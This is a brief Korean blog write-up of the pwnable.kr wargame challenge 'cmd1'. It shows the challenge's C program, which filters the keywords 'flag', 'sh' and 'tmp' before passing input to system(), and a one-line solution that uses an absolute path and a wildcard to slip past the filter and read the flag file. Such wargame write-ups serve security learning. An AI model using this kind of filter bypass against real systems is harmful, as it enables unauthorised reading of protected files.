tmxklab
[pwnable.kr] cmd1 본문
1. 문제 확인
[ cmd1.c ]
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/thankyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
2. 접근 방법
걍 필터링 피해서 인자 값 세팅해주면 될 듯 하다.
3. 문제 풀이
cmd1@pwnable:~$ ./cmd1 "/bin/cat ./fla*"
4. 몰랐던 개념
'War Game > pwnable.kr' 카테고리의 다른 글
| [pwnable.kr] uaf (0) | 2020.12.02 |
|---|---|
| [pwnable.kr] cmd2 (0) | 2020.12.02 |
| [pwnable.kr] lotto (0) | 2020.12.02 |
| [pwnable.kr] blackjack (0) | 2020.12.02 |
| [pwnable.kr] coin1 (0) | 2020.12.02 |
'War Game/pwnable.kr' Related Articles
more
Comments